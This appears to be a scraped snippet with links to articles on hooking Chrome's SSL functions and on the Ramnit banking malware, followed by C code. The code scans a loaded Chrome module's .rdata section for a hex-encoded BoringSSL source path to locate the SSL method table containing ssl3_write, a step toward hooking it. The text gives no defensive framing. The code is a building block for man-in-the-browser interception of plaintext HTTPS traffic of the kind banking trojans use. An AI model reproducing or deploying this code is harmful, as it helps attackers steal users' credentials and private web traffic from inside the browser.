https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/ http://www.rohitab.com/discuss/topic/41729-google-chrome-ssl-write-hook-openssl/ https://www.emanueledelucia.net/the-ramnit-web-browser-specialist-hooker-number-ii/ Now the decoded string below translates to: c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
typedef struct \_SSLMETHODS { int version; int (*ssl3\_new)(void *s); int (\*ssl3_clear)(void\*s); void (*ssl3_free)(void *s); int (*ssl3_accept)(void *s); int (*ssl3_connect)(void *s); int (*ssl3_read)(void *s, void *buf, int len); int (*ssl3_peek)(void *s, void *buf, int len); int (*ssl3_write)(void *s, const void *buf, int len); int (*ssl3_shutdown)(void *s); }SSLMETHODS, *PSSLMETHODS; PSSLMETHODS FindSSLWrite(char* szModule) { unsigned char ucString[] = { 0x63,0x3a,0x5c,0x62,0x5c,0x62,0x75,0x69,0x6c,0x64,0x5c,0x73,0x6c,0x61,0x76,0x65,0x5c,0x77,0x69,0x6e,0x5c,0x62,0x75,0x69,0x6c,0x64,0x5c,0x73,0x72,0x63,0x5c,0x74,0x68,0x69,0x72,0x64,0x5f,0x70,0x61,0x72,0x74,0x79,0x5c,0x62,0x6f,0x72,0x69,0x6e,0x67,0x73,0x73,0x6c,0x5c,0x73,0x72,0x63,0x5c,0x73,0x73,0x6c,0x5c,0x73,0x73,0x6c,0x5f,0x6c,0x69,0x62,0x2e,0x63,0x00}; HMODULE hModule = GetModuleHandleA(szModule); if (hModule) { PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)hModule; PIMAGE_NT_HEADERS pNT = (PIMAGE_NT_HEADERS)(pDos->e_lfanew + (DWORD)hModule); if (pNT->Signature == IMAGE_NT_SIGNATURE) { PIMAGE_SECTION_HEADER pSection = 0; int i = 0; for (i = 0 ;i < pNT->FileHeader.NumberOfSections; i ++) { pSection = (PIMAGE_SECTION_HEADER)((DWORD)pNT + sizeof(IMAGE_NT_HEADERS) + (sizeof(IMAGE_SECTION_HEADER)*i)); if (!strcmp((char*)pSection->Name, ".rdata")) { int Offset = 0; for(Offset = 0; Offset<pSection->SizeOfRawData;Offset++) { DWORD dwPosition = (DWORD)hModule+pSection->VirtualAddress + Offset; if (!memcmp(ucString,(LPVOID)dwPosition,sizeof(ucString))) return (PSSLMETHODS)(dwPosition - 0x64); } } } } } return 0; } |